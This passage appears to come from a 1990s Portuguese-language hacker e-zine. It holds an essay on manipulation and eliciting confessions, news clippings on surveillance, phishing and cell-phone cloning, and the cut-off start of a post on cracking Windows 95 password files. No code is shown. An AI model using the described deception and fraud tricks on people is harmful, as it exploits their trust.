mundo. Uma conversa entre duas pessoas acontece por conta de varias
coincidencias. Ambos falam a mesma lingua. Ambos estao interessados em um
dialogo. Ambos estao interessados em falar e ouvir. Mas depois do momento
inicial, em que ja se conversou o obvio, a coisa pode progredir ate varias
camadas de profundidade. Tipo conversa de familia que tem adolescente, na
hora das refeicões.. uma opiniao sobre a sopa pode terminar num palavrorio
sobre o aborto ou um interrogatorio sobre a situacao escolar. Ou pode ser
como um bate-papo num CHAT ou IRC da vida em que a pessoa acaba se dando
conta de que realmente esta fazendo isso ou aquilo errados, que detesta o
emprego, a pessoa com quem esta morando, etc, etc..

E' , pode-se descobrir como e bom descobrir alguem novo, nossa propria
identidade. A igreja sempre fez o maior sucesso com isso, tem um negocio
chamado "confissao". Um segredo entre o padre e o "pecador" que o procura.
Leon Eliachar, famoso humorista mineiro, tinha um proverbio (nao sei se
ainda me lembro), onde dizia ter perdido a conta do numero de vezes que foi
enganado: e uma sensacao maravilhosa poder confiar no ser humano... e..  e
o pior e que e mais facil ainda confiar num estranho do que em alguem da
propria familia, as vezes. Sim, porque a familia so conhece uma parte da
pessoa. E uma pessoa e produto de um amontoado de influencias,
experiencias, amizades, coisas especificas de idade, etc, que torna dificil
que duas pessoas morando juntas realmente saibam tudo que a outra pessoa
esta pensando. Parto do principio que quem conseguiu seguir meu ponto de
vista ate aqui talvez entenda mais tarde onde vou chegar.

Diga-me com quem andas e eu te direi quem es. Temos amigos que nao sao
conhecidos entre si. As vezes. E conhecemos gente que nao queremos que
ninguem saiba que conhecemos. As pessoas sao muito menos racionais do que
imaginam. Embora o papel do confessionario tenha sido substituido pelo
terapeuta, assistente social, etcs, o mais comum e a pessoa procurar quem
esteja disposto a ouvir, nao importa quem. Nao importa o assunto, nao
importa o local. Em alguns casos, a conversa nao e mais do que um monologo
disfarcado. E'  uma pessoa que quer falar para uma outra que nao se importa
de ficar ouvindo. Tudo depende do assunto e da disposicao. Tudo depende da
ausencia de fatores que inibam o bate-papo. Tem muita gente que se desinibe
total na frente de um computador na internet porque a principio, nao ve a
cara de sono do sujeito do outro lado, nao ve o rosto cheio de espinhas,
aquela cara de "to na frente do micro desde ontem de manhaaaaaa e ainda nao
escovei os dentes hoje..." E'  um barato. A pessoa e aquilo que digita. Pode
brincar de romantico e morrer de dar risada, porque como a pessoa do outro
lado vai saber? Dai aparece um historia dessas:

     Casal que se conheceu pela Internet some

     [..]Os dois se comunicaram pela Internet durante 30 dias, ate
     final de setembro, em media oito horas por dia. Silva
     apresentou-se pelo computador como um rico fazendeiro,enviando
     como "provas" fotos de touros, uma fazenda e um aviao,alem de
     muitas flores e declaracões de amor.[..]

     Ex-modelo, a vendedora enviou antigas fotos suas, de uma epoca em
     que estava 20 quilos mais magra. "Antes de se encontrarem, ela
     explicou que estava mais gordinha. Ele entendeu e nao se
     decepcionou", disse a mae de Carla.[..]

     (Folha de Sao Paulo, sexta, 17 de outubro de 1997 RUBENS VALENTE
      da Agencia Folha, em Campo Grande PAULO MOTA da Agencia Folha,
     em Fortaleza ).

O mais dificil pode ser estabelecer a confianca inicial.

A maioria nao entende ou classifica isso como "papo de vendedor" e nao
entende como que podem acabar caindo numa situacao bem pior, por coisa a
toa. Por exemplo, estava com uma turma, num bar da periferia, altas horas
da noite. Aparece uma patrulha. Todo mundo que e adolescente ja passou por
uma situacao semelhante a da favela Naval, mas era apenas uma blitz, sem
aquela coisa toda. Todo mundo foi apenas revistado, etc, etc.. Quando tudo
parecia ja que ia terminar, os outros policiais estavam indo embora, um
deles, bem baixinho, parecia ate que nao fazia parte, foi bater um papo com
um amigo meu, mais afastado. E conversava legal, sorria, pedia desculpas,
falava que infelizmente era o servico deles, etc, falou da vida dele, que
tinha namorada, que tambem gostava de farrear, quando parecia que os dois
sorrindo juntos, trocando piadas e falando de farras, o policial veio com
um lance de que ele fumava "daquele tabaco"  e .. sorrindo (porque os dois
estavam rindo) sugeriu que o amigo tambem fumava..

"Isso e minha vida pessoal, nao vou dizer"

O policial fez entao um discurso que os literatos ate classificariam de
inflamado, exaltado, sobre trocentas qualidades que a mae, a avo, a bisavo
do sujeito ofereciam ao publico, num bordel da periferia. Do pai, do avo e
bisavo comentou algo sobre tradicao e contribuicões para a cultura gay de
Campinas, todo um palavrorio meio desperdicado. Meu amigo cobriu a boca com
mao e fechou os olhos.  E nao falou mais nada, ate a viatura ir embora.
Explicacao: responder nesse caso seria desacato a autoridade. Ia acabar na
delegacia. Pelo menos teve presenca de espirito, porque se tivesse, somente
para ser educado, admitido algum dia ter fumado "tabaco", poderia ter sido
obrigado a dizer quem forneceu. Aquele policial deveria ser um especie de
especialista nesse tipo de "confissao" e a noite poderia ter terminado
muito mal, talvez igual aquela de Diadema.

Existe o fator bebida. "In vino veritas" A verdade esta no vinho. Com a
dose certa de alcool na cabeca, todo mundo conta tudo. E todo mundo pensa
que e so alcool que embriaga. Uma pessoa que esteja muito alegre porque o
Timao (ou o Palmeiras ou o Vasco) ta na frente, tambem fica vulneravel.

A grande chave do sucesso e a sinceridade. E como tem gente que consegue
falsificar "sinceridade". As vezes  nao e tao facil. Mas ai a outra pessoa
pode tambem apelar para o lado nobre de cada um, como ja descrevi acima.
Numa banca de revistas 24 horas na Paulista, percebi o seguinte truque: o
dono vendia revista estrangeira por menos da metade. Existem varias bancas
em Sao Paulo onde e possivel isso. Mas na hora do sujeito puxar a nota de
10 R$ pra pagar 4 R$, o vendedor distraidamente puxava conversa com um
ciclano ou beltrano. Na hora de dar o troco fingia "voce me deu 5, nao
foi?" O comprador tava tao feliz da vida de ter conseguido uma pechincha
que as vezes ate aceitava o prejuizo. Vi isso 2 vezes acontecer e tomei
partido do fregues. O vendedor soltou aquele discurso "voce acha que vou me
sujar por conta de 5 R$?" Mas ja vi esse truque ser feito com gente em
Minas, Rio de Janeiro, Porto Alegre. Uma vez ate por conta de 0,10. A
pessoa fica tao alegre em poder gastar com alguma coisa que esquece que, se
puder, tem vendedor que prefere nao dar o troco. E de tao alegre que esta,
a pessoa nao se anima a fazer escandalo, para nao passar por pobre.
Restaurante, no Rio de Janeiro, roubava na conta direto, ate que virou "in"
conferir a conta. Isso nos anos 80, hoje nao sei.

E' , pode se dizer que "colecionei"  essas historias para contar aqui.
Qualquer pessoa que viva o suficiente acaba aprendendo como se defender de
algumas malandragens. Mas o problema e nao perceber que nao e de dinheiro
que falei no paragrafo anterior. E'  do medo que a pessoa tem de ser contra
algo errado, apenas porque isso pode gerar constrangimento. E'  de repente
estar por dentro que uma pessoa pode fazer voce entrar numa situacao
"irrecusavel". E numa dessas se cai numa armadilha. Uma vez li numa revista
que um sujeito, falando de outro, comentou uma festa bem doida para o qual
tinha sido convidado. O cara era um idolo da juventude (era, veio a Aids, e
como a Legislacao proibe difamar os mortos..). Chegou uma hora em que o
lance da festa era o seguinte: todo mundo ali tinha que assumir que no
fundo do fundo do fundor era bissexual. "Quem nao admitisse era por que
tinha alguma frescura e fresco tinha mais e que nunca mais vir numa festa
dele". Detalhe: a maioria do pessoal constava no RG como sendo do sexo
masculino. Nao sei se isso foi invencao de um cara sobre outra figura que
acabou virando simbolo de luta contra a Aids, etc, etc.. mas e de se pensar
ate que ponto uma pessoa e fa de outra. Perigoso.

Vou terminar contando uma historia sobre um cara chamado Mordechai Vanunu.
Um sujeito comum, israelense. Pegou um estagio numa fabrica da terrinha
dele, sem saber o que era direito. Descobriu que a dita cuja produzia
equipamentos muito especificos. Bombas nucleares. Coisa completamente
ignorada pelo mundo, na epoca. Totalmente secreto. E .. era um sujeito
idealista, embora tivesse altos problemas com a familia. Juntou entao um
problema familiar com um problema de consciencia. Por via das duvidas,
decidiu fotografar o local. E continuou trabalhando la. Ate que um dia, pra
desanuviar a cabeca, saiu pelo mundo. Sem resolver os probleminhas de cuca.
E acabou encontrando uma alma gemea, um cara que tinha feito a mesma linha
de estudo que ele. Nietzche, Kierkegaard, essas coisas. Igreja Anglicana.
Dificil acreditar, mas se converteu e passou a frequentar direto. Numa
noite qualquer, o bate papo la da congregacao era desarmamento nuclear, o
novo convertido abriu a boca pra aliviar seu grande segredo. Na Australia,
o sujeito estava. Em pouco tempo um jornal da Inglaterra, o London Sunday
Times mandou um reporter pra entrevistar. Vamos contar para o mundo que
Israel tem a bomba! Legal, o cara foi levado para o Reino Unido. Ia ser uma
bomba, a noticia, em todos os sentidos. Alias foi.

So que o servico secreto israelense, o MOSSAD ficou sabendo.O pessoal la
ficou meio p(*) da vida. Parece que os EUA ja sabiam da fabrica de bombas,
mas fingiam nao saber. De  qualquer forma, o que era uma especie de boato,
teve algum tipo de confirmacao, ja que o cara tinha fotos da coisa
toda. Legal, ne? O jornal adiou um pouco a publicacao, sabe-se la porque. O
novo convertido ficou mofando, mofando la naquela cidade que se chama
Londres, provavelmente sentindo que nem o Caetano, procurando disco voador
no ceu (na falta do que fazer no Hyde Park). Ai pinta aquela gostosa do
lado dele. Conversa vai, conversa vem.. o cara resolve descarregar suas
confissões e frustracões, ela e boa ouvinte, escuta tudo. E ficam amigos,
os dois. Namoram. Ela convida ele para uma sei-la-oque de mel na Italia.
Ele vai. Hoje o Mordechai resolveu seus problemas de habitacao, por assim
dizer. Vive extremamente seguro. Prisao de seguranca maxima. O MOSSAD tinha
contratado a menina para fazer ele sair da Inglaterra. Na Italia, foi
sequestrado e levado para Israel onde foi julgado por alta traicao. 18 anos
numa solitaria, de vez em quando um ou outro irmao o visita. Existe um
movimento no exterior clamando pela sua libertacao. Ouvi falar. Mas fica a
historia: "Quem conta seus segredos, perde a liberdade."
     NEWS  -  DICAS - BOATOS - HUMOR - NOVOS BUGS - CARTAS - SEI LÁ ..

RECEITA TESTA SISTEMA CONTRA SONEGAÇÃO

Objetivo e cruzar informacões cadastrais de empresas com declaracões de IR
de pessoa juridica

BRASÍLIA - A Secretaria da Receita Federal esta montando um sistema
integrado para reduzir, ainda mais, as possibilidades de sonegacao de
impostos federais por parte das empresas. Um projeto piloto ja esta em
execucao no Rio, com o objetivo especifico de cruzar as informacões de
cadastro das empresas com as declaracões de Imposto de Rednda da Pessoa
Juridica (IRPJ) e co os dados que fornecem por meio de outro documento,
denominado Declaracao de Contribuicões e Tributos Federais (DCTF). Nesse
documento a Pessoa Juridica informa tudo o que pagou de imposto e relaciona
eventuais creditos tributarios que tem a receber.

Trata-se de uma inovacao da Receita para eliminar as brechas que ainda
permitem aos proprietarios de empresas sonegar imposto como Pessoa Juridica
ou ate na condicao de Pessoa Fisica, quando apresentam suas declaracões
individuais. Montar interligacao dos sistemas foi tarefa facil, pois a
Receita opera com 400 programas.

Hoje, esses programas nao se comunicam e, para verificar ou cruzar
informacões, e preciso uma analise especifica pelo Serpro. A Receita espera
que ate o fim de 1998 todos os programas estejam interligados.[...] (Estado
de Sao Paulo, 15/08/97 - Beatriz Abreu e Lu Aiko Otta - secao de Economia)

Espiões Vermelhos

Como a policia secreta de [..] espionava a oposicao, sindicatos e ate o PT.

[..] O governador [..] tambem gosta de se alimentar de informacões
produzidas na velha arapongagem policial. VEJA teve acesso a 123 relatorios
feitos por uma equipe de quarenta policiais militares que formam o braco
secreto da PM de Brasilia, a PM-2. Nos documentos, constata-se que a
policia secreta do governador se encarrega de espionar reuniões de
sindicatos petistas e ate encontros de cupula do proprio PT.

Como e regra nesse servico, o trabalho dos agentes que se infiltravam em
reuniões partidarias era condensado na forma de relatorios. Uma copia deles
ia para o Centro de Informacões do Exercito, o CIE. Outra era enviada para
a Agencia Brasileira de Inteligencia, Abin, que sucedeu ao SNI. Uma
terceira era despachada para o gabinete militar do governador. Lendo-se os
relatorios, constata-se que os agentes secretos invadiam propriedade
privada e operavam fora das divisas do Distrito Federal. Um dos relatorios,
de abril do ano passado, mostra que agentes chegaram a bisbilhotar uma
fazenda do deputado distrital e empresario Luiz Estevao, o amigo de Collor
e lider da oposicao ao governador. [..] A PM-2 formou uma estrutura com 140
pessoas, divididas entre as que saem à rua para trabalhar e aquelas que
ficam no escritorio batendo papo, o chamado "apoio". Nao usavam farda nem
iam ao quartel. Nao andavam em viaturas, usavam nomes falsos e agiam como
personagens de um filme B de espionagem. Tambem usavam equipamento de
filmagem, gravacao e armamento. Dentro do Palacio do Buriti ha uma sala de
cerca de 30 metros quadrados onde fica um computador que armazena parte dos
relatorios. A sala, chamada oficialmente de Secao de Apoio Tecnico da Casa
Militar, fica a menos de cinquenta passos do gabinete do governador. O
pedaco mais curioso, batizado de subsecao de operacões, fica num pequeno
predio, quase oculto, na Esplanada dos Ministerios, proximo ao Ministerio
da Fazenda. E'  um lugar cercado de mato alto, onde se revezam trinta
agentes. E'  nesse bunker que os arapongas faziam seus relatorios. [..] Em
todos os Estados, a PM tem um braco secreto e nao e incomum que extrapole
suas funcões, entrando no terreno da espionagem e pura bisbilhotice. [..]
Quando um governador toma posse nao precisa mandar a Secretaria da Fazenda
recolher tributos. Isso e uma tarefa automatica. No caso do braco secreto
da PM acontece o mesmo. A bisbilhotagem segue em que alguem de uma ordem. O
governador pode proibir a atividade, estimula-la ou deixar tudo como esta,
como quem nao sabe de nada.[...]

(VEJA - 25/09/96 - pags 38,39,40 - Policarpo Jr., Brasilia)

OLHAR ELETRÔNICO QUE VIGIA SP

Cameras do CET registram tudo o que se passa em 86 cruzamentos e quatro
tuneis da cidade.

Sentir-se observado, procurar por toda parte e nao encontrar ninguem pode
nao ser mania de perseguicao. Voce esta mesmo sob olhares atentos, apesar
de nem desconfiar disso. Mas o poderoso instrumento da "espionagem", que
nao perde um detalhe em seu campo de visao de 360 graus e da zooms
inacreditaveis e simples de ser localizado. Basta voltar a cabeca para cima
num dos 86 cruzamento ou 4 tuneis. La estao as cameras da Companhia de
Engenharia de Trafego (CET).

Nesse momento, tecnicos de controle de trafego (TCT) podem estar captando o
movimento on line num dos monitores das centrais espalhadas por Sao Paulo.
Pelas telas das salas sempre na penumbra, esses profissionais tem uma
pequena amostra de tudo o que acontece nas ruas da cidade. Imagens sem
sons, mas impressionantes. Vao do acidente digno de filme de acao a
relacões sexuais praticadas por casais dentro de carros parados nos tuneis.

Flagrar cenas tao constrangedoras como motoristas da terceira idade
estapeando-se apos uma batida, e quase um "acidente". [..] "O objetivo e a
informacao visual do trafego, faze-lo fluir", diz o coordenador do Projeto
Semaforos Inteligentes da CET, Edgar Linguitte.[..]

Assim que qualquer ocorrencia e registrada pela camera, os tecnicos põem o
video para funcionar. "Da gravacao, podemos tirar estrategias para corrigir
os problemas", diz Pulz. [..] Quando aciona o zoom de alguma camera para
socorrer alguem, por um momento o TCT Marcio Donizete tem a sensacao de
estar invadindo a privacidade das pessoas. "A gente vai no rosto do
motorista, ve seus tracos", admite Lima, que trabalha na Central da Bela
Cintra, "Se ha um acidente com duas pessoas, e como se voce fosse a
terceira, tamanha a realidade das imagens".[..]

Os casais paulistanos, por sua vez, tem escolhido os tuneis para namorar.
Dentro dos carros, parados nas baias planejadas para emergencias, sentem-se
protegidos dos curioso e mantem relacões sexuais sem o menor
constrangimento.[..] Talvez a situacao so seja complicada para o
marronzinho que precisa ir ao local e convidar os animados namorados a
retomar a viagem.[..] A urbanista Arlete Moyses Rodrigues, livre-docente da
Universidade Estadual de Campinas (Unicamp) considera o sistema uma invasao
da privacidade. "Esse tipo de fiscalizacao nao acrescenta nada, o que
deveria haver era investimento em educacao".

(Jornal O Estado de Sao Paulo, 24/08/97, pags C1 - C4 - Marisa Folgato)

---------------------------------------------------------------------------

E D U P A G E

26 de agosto de 1997  |  Portugues

________________________________________________________________________

FRAUDES ON-LINE ENVOLVENDO CARTAO DE CREDITO

Devido ao grande numero de assinantes que inclui muitos iniciantes nas
atividades on-line, a AOL (America Online) vem sendo um alvo facil para
criminosos que tentam cometer fraude; os assinantes da AOL vem recebendo
mensagens que objetivam descobrir numeros de cartao de credito.  Em
recente mensagem intitulada "Informacoes Importantes da AOL" e falsamente
identificada como vinda do Departamento de Assinaturas da AOL, os
destinatarios das mensagens foram convidados a entrar na pagina da AOL na
Web e fornecer seus nomes e numero de cartao de credito.

Washington Post 26 ago 97

________________________________________________________________________

JUIZA DECIDE QUE CONTROLES DE EXPORTACAO DE CRIPTOGRAFIA VIOLAM
LIBERDADE DE EXPRESSAO

Uma juiza de um Tribunal Distrital dos EUA decidiu que as restricoes,
recentemente revisadas pelo Governo Clinton, sobre exportacao de
software de criptografia, sao inconstitucionais.  Em dezembro, ela
determinou que uma versao submetida era inconstitucional.  A decisao da
juiza foi baseada em sua crenca de que codigos de computadores sao
formas de expressao, "como musica e equacoes matematicas", e
restringi-las constitui uma violacao da liberdade de expressao.  Alem
disso, a nova regulamentacao, assim com as antigas, nao estabelece
prazos ou padroes para as decisoes sobre licencas concedidas pelo
governo e nao preve a revisao judicial.  A decisao "tera' um forte
impacto na lideranca dos EUA na industria de software e do comercio
eletronico", comentou um representante da Electronic Frontier
Foundation", e um impacto enorme na questao do direito 'a privacidade
nos proximos 100 anos".

AP 26 ago 97

______________________________________________________________________

CRACKER SE DECLARA CULPADO POR ROUBO DE INFORMACOES DE CARTAO DE CREDITO

Um cracker de computador, acusado de roubar mais de 100.000 numeros de
cartao de credito de empresas que vendem produtos pela Internet,
declarou-se culpado antes da data do julgamento e podera' pegar 30 anos
de prisao e multas de ate' US$ 1 milhao.  A sentenca esta' prevista para
ser proferida em 25 de novembro desse ano.

AP 26 ago 97

________________________________________________________________________

17 de agosto de 1997  |  Portugues
________________________________________________________________________

PROBLEMAS DE SEGURANCA

Dois dias apos a Experian Inc. (bureau de credito conhecido no passado
como TRW Information Systems & Services) ter comecado a permitir que os
clientes utilizassem a Internet para consultar seus relatorios pessoais
de credito, a empresa repentinamente interrompeu a prestacao do servico
apos ter tomado conhecimento de que quatro pessoas obtiveram informacoes
financeiras sobre terceiros.  A professora de computacao da Universidade
de Georgetown, Dorothy Denning, declarou que a experiencia da Experian
"mostra como e' dificil a seguranca on-line no caso de prestacao de
servicos de acesso a informacoes".

Washington Post 16 ago 97

________________________________________________________________________

INDIVIDUO DELATADO POR PROVEDORA DE ACESSO E' PRESO POR PORNOGRAFIA

Uma provedora de servico Internet nao identificada, que auditava a conta
de um individuo do Colorado "por razoes de negocios", alertou a policia
de que tal individuo havia baixado mais de 70 fotos coloridas de adultos
praticando sexo com criancas.  Estar em posse de material sobre
pornografia infantil e' ma' conduta, e produzir e distribuir tal
material e' crime; o individuo foi preso.  Dave Banisar, do Centro de
Informacoes Eletronicas de Privacidade levantou a questao da
privacidade.  "As provedoras de servico nao devem fazer esse tipo de
coisa.  Elas sao como as companhias telefonicas, que nao tem acesso 'as
conversas telefonicas.

AP 16 ago 97

________________________________________________________________________

HORA DE SE DESCONECTAR! AGORA! ENQUANTO E' TEMPO! SERIO MESMO!

A psicologa da Universidade de Pittsburgh, Kimberly S. Young,
acha que as "salas de bate-papo" do ciberespaco e os jogos de fantasia
constituem as principais atracoes para as pessoas propensas a se
"viciarem" na Internet.  "Como nos bares de encontros, onde todos acabam
conhecendo seus nomes".  Young comentou que vem sendo contatada por
advogados a respeito de divorcios causados pelo vicio de um dos conjuges
na Rede.

AP 15 ago 97

E D U P A G E

2 de outubro de 1997 | Portugues

________________________________________________________________________

"GERENTE DE CONHECIMENTOS": O MAIS NOVO ALIADO DA TECNOLOGIA

O novo cargo que esta' crescendo nos circulos da tecnologia da informacao
e' o de "Gerente de Conhecimentos". A descricao do cargo se concentra em
trazer negocios em potencial e conhecimentos tecnicos para melhorar a
posicao da empresa na concorrencia e envolve nao apenas localizar como
tambem organizar, manipular, filtrar e apresentar informacoes de forma que
os empregados na linha de frente possam compreende-las e utiliza-las. Hal
Varian, decano da Faculdade de Administracao de Informacao e Sistemas da
Universidade de Berkeley, na California, comentou que existe uma grande
quantidade de informacoes com que conta uma empresa e e' necessario
estruturar tais recursos para que sejam uteis". Fornecer essa estrutura e
trabalhar com o lado tecnico da empresa para tornar os recursos de
informacao disponiveis e uteis aos empregados sera', cada vez mais, um
elemento chave para a maioria das empresas nos proximos anos.

Information Week 29 set 97

________________________________________________________________________

SINDROME DA FADIGA POR EXCESSO DE INFORMACAO - PERIGOSO PARA A SAUDE

O fenomeno de contrair enfermidades como resultado do estresse causado por
uma sobrecarga de informacoes tem agora um nome oficial - Sindrome da
fadiga por excesso de informacao - e, de acordo com um relatorio do Reuters
Business Information de 1996, quase metade dos gerentes de primeira linha e
um terco de todos os gerentes sofrem dessa sindrome.

Investor's Business Daily 1 out 97

E D U P A G E

9 de novembro de 1997 | Portugues

O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT

O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das
maiores fabricantes de computadores do mundo, esta' processando a Microsoft
por interferir na investigacao do estado de possivel infracao da lei
anti-monopolista da Microsoft, e os representantes do estado estao furiosos
com a Microsoft por esta nao liberar os fabricantes das clausulas de
"sigilo" contidas nos contratos de licenca. O procurador do geral do estado
comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida
os fabricantes de computadores, cuja sobrevivencia depende essencialmente
do acesso ao software de sistema operacional da Microsoft, que roda em 90%
de todos os computadores pessoais vendidos hoje em dia. Os fabricantes
estao com medo de passar informacoes porque nao ha' como eles as passarem
confidencialmente". A Microsoft responde: "Permanecemos dispostos a
discutir quaisquer conciliacoes que acomodem adequadamente os interesses da
Microsoft em relacao 'a divulgacao de informacoes potenciais de sua
propriedade... O codigo e os termos sob os quais se licencia esse codigo a
outros constituem ativos criticos de qualquer empresa que esteja no ramo de
software. Assim sendo, e' muito importante que se assegure a protecao
adequada a esses ativos".

New York Times 8 nov 97

________________________________________________________________________

E D U P A G E
9 de novembro de 1997 | Portugues
O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT
O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores
fabricantes de computadores do mundo, esta' processando a Microsoft por
interferir na investigacao do estado de possivel infracao da lei anti-monopolista
da Microsoft, e os representantes do estado estao furiosos com a Microsoft
por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos
contratos de licenca. O procurador do geral do estado comentou: "O dominio
exagerado de mercado exercido pela Microsoft intimida os fabricantes de
computadores, cuja sobrevivencia depende essencialmente do acesso ao software
de sistema operacional da Microsoft, que roda em 90% de todos os computadores
pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar
informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft
responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem
adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes
potenciais de sua propriedade... O codigo e os termos sob os quais se licencia
esse codigo a outros constituem ativos criticos de qualquer empresa que esteja
no ramo de software. Assim sendo, e' muito importante que se assegure a protecao
adequada a esses ativos".
New York Times 8 nov 97
________________________________________________________________________

E D U P A G E

6 de novembro de 1997  |  Portugues
________________________________________________________________________

LEGISLACAO PARA ROUBO CIBERNETICO COLOCARIA ATE' ROBIN HOOD NA CADEIA

De acordo com um projeto de lei introduzido pela Camara de Deputados
dos EUA pelo congressista Bob Goodlatte (republicado pelo estado da
Virginia), qualquer pessoa que utilize a Rede para se apropriar
indevidamente de trabalhos patenteados estara' cometendo uma infracao
federal, seja qual for o objetivo do ato - lucro pessoal ou nao.  A
inspiracao para essa legislacao veio de um julgamento de um caso em
Massachusetts em que um estudante deixou 'a disposicao do publico, em
um boletim eletronico, um software comercial.

AP 6 nov 97
________________________________________________________________________

MCNEALY CONTRA GATES

O executivo da Sun, Scott McNealy, fez um apelo aos apoiadores da
linguagem Java para que enviassem uma "enxurrada" de mensagens
eletronicas para Bill Gates registrando que "queremos 100% Java".  Ele
comentou:  "A Microsoft nao e' mais distribuidora de plataformas Java.
As pessoas estao confusas, com a impressao que existem duas versoes da
Java.  Isso nao e' verdade, so' existe uma: Java pura ...  Ao se pingar
tres gotas de veneno em uma aplicacao 100% Java,  obtem-se ... Windows.
Ao se pingar tres gotas de Java em Windows, ainda obtem-se Windows."
Tod Nielsen, executivo da Microsoft, respondeu 'as acusacoes de
McNealy assim:  "A diretoria da Sun deveria lavar a boca com sabao.
Se minha filha de cinco anos falasse dessa forma ela estaria soltando
bolhas de sabao pela boca".

New York Times Cybertimes 6 nov 97

________________________________________________________________________

O CASAL DA INTERNET

Sao Paulo, segunda, 20 de outubro de 1997.

-----------------------

NAMORO VIRTUAL

Eles estavam em um hotel

Casal da Internet e achado vivo no PI

e do NP

Policiais de Teresina (PI) prenderam anteontem, às 7h, o goiano Oliveira e
Silva, que ha 12 dias havia sumido com a artista Carla Patricia Coelho, que
mora em Campo Grande (MS).

[..]

Silva e Carla foram encontrados na ???????? ??????? Hotel, na BR-316. Ele
foi preso em flagrante e autuado por de automovel. "Ele furtou um carro em
Fortaleza para fugir a artista plastica", disse o delegado.

[..]

"Cai num abismo. Nao sei se conseguirei acreditar nas pessoas",afirmou
Carla.

------------------------

Sao Paulo, terca, 21 de outubro de 1997.

Plano de internautas era se casar ntem

(PAULO MOTA da Agencia Folha, em Fortaleza RUBENS VALENTE da Agencia Folha,
em Campo Grande)

O desempregado Flavio de Oliveira e Silva, 36, e a artista plastica Carla
Patricia Coelho, 29, que se conheceram pela Internet e passaram 13 dias
desaparecidos, tinham planejado se casar ontem, numa "grande festa à moda
cigana", em Campo Grande(MS). "Ele (Silva) disse que iria aproveitar o
aniversario dele hoje (ontem) e fazer uma festa so", afirmou Carla.

Os dois foram encontrados pela policia anteontem num hotel, em Teresina
(PI). Eles estavam sem dar noticias a parentes desde 8 de outubro, quando
sairam de um hotel luxuoso em Fortaleza (CE) sem pagar a conta de R$ 1.700.
Silva foi preso em flagrante, acusado de estelionato e nao quis falar com a
Agencia Folha. A policia acredita que Carla foi enganada por Silva e
considerou-a inocente.

[..]

O casal se encontrou em 2 de outubro, em Goiania, e embarcou para
Fortaleza, para uma "viagem de lua-de-mel". A hospedagem foi numa suite com
vista para o mar e diaria de R$ 273. Usando um carro alugado em Fortaleza,
o casal acumulou divida de R$ 4.800 em despesas e hospedagens em hoteis de
praias como Jericoacoara (CE), Parnaiba (PI) e Sao Luiz (MA). As contas
foram pagas com cheques e cartões de Carla, que confiava num deposito de R$
10 mil que Silva havia feito em sua conta. O cheque depositado era roubado
de outra conta da propria Carla.

Ela diz que so descobriu que Silva estava mentindo quando a policia os
abordou em Teresina.

FOLHA DE Sao Paulo, domingo, 13 de julho de 1997.

EMPREGADO LADRÃO

perfil do funcionario desonesto aplica mais golpes no trabalho

PIVETTA

Reportagem Local

Pesquisa feita pelo especialista em fraudes e crimes financeiros

Marcelo Alcides Gomes, 33, tracou o perfil do empregado que rouba ou da
golpes na empresa em que trabalha. De acordo com dados preliminares da
pesquisa, o golpista tipico e o homem casado, com idade entre 31 e 40 anos,
que ocupa um cargo abaixo do nivel de gerencia e terminou apenas o segundo
grau.

As mulheres aparecem na pesquisa como sendo autoras de apenas 16,7% dos
delitos cometidos nas empresas. Primeiro brasileiro a ser aceito como
membro da Association of Certified Fraud Examiners (associacao de
investigadores de fraudes em empresas) -que reune 13 mil associados e e
sediada nos EUA-, Gomes enviou questionarios a 1.500 empresas brasileiras
(inclusive as 500 maiores) e recebeu, ate agora, resposta de 735
companhias.

A pesquisa constatou algum tipo de golpe ou desfalque cometido por
funcionarios em 717 (97,5%) das 735 empresas. "Apesar de a maioria dos
crimes serem cometidos por empregados com nivel inferior ao de gerente e
sem curso superior, os maiores desfalques, em termos financeiros, tendem a
ser feitos por profissionais com cargo de gerencia ou diretoria e curso
superior completo", afirmou Gomes.

---------------------------------------------------------------------------

revista VEJA 08-10-97                    Daniel Nunes Goncalves

A estudante paulista Alessandra Massis comprou um telefone celular ha sete
meses. Ela utiliza o aparelho com comedimento e raramente faz ligacões
interurbanas. Chamada internacional, nem pensar. Sua conta e a traducao de
seus habitos: 60 reais, no maximo. A fatura de marco, portanto, so podia
deixa-la de cabelo em pe: 13.571 reais. "Quase morri de susto", diz a
estudante. A conta acusava 1.032 ligacões para 36 paises, do Kuwait à
Colombia, passando pela Suica e Afeganistao. Alessandra procurou a empresa
telefonica do Estado de Sao Paulo, Telesp, e convenceu os funcionarios a
dispensa-la do pagamento.[..] . A cada trinta minutos, a companhia recebe a
visita de um dono de celular apavorado com contas astronomicas, fruto de
ligacões que dizem nao ter feito, todos vitimas de uma fraude que so faz
crescer clonagem. Os clones sao telefones nao registrados, programados para
debitar suas chamadas na conta de pessoas desavisadas, como Alessandra.

[..]

Desde o inicio do ano foram registrados milhares de casos de clonagem.
Fala-se num prejuizo estimado em 60 milhões de reais para as teles, que
poupam os clientes do pagamento mas tem de pagar à Embratel e às
telefonicas internacionais pelas chamadas efetuadas.

[..]

Para programar um celular frio para debitar suas chamadas na conta de um
celular quente e preciso ser tecnico em eletronica e comprar um equipamento
de radio portatil   chamado scanner, que custa 400 reais e registra a
freqüencia em que operam os celulares à sua volta.

[..]

Para dar alguma seguranca ao usuario, a Embratel contratou uma firma
americana, a Digital, que vai instalar um sistema antifraude orcado em 14
milhões de reais. O sistema, empregado na Franca e na Italia, compara cada
nova ligacao feita com o historico de chamadas da pessoa. "Se alguem so faz
ligacões nacionais e surge uma chamada internacional de uma hora, o
computador dispara um alarme. Ai, entramos em contato com o usuario para
checar a autoria do telefonema", informa Jose Carlos Gabarra, da Digital. O
novo sistema deve estar operando ate marco do ano que vem

---------------------------------------------------------------------------

BUGS e DICAS

------- start of forwarded message (RFC 934 encapsulation) -------

From: Frank Andrew Stevenson <frank@funcom.no>

To: cypherpunks@toad.com

Subject: Cracked: WINDOWS.PWL

Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET)

A few days ago Peter Gutmann posted a description on how Windows 95
produces RC4 keys of 32 bits size to protect the .pwl files. I verified the
information and wrote a program to decrypt .pwl files with a known
password, I then discovered that the .pwl files where well suited for a
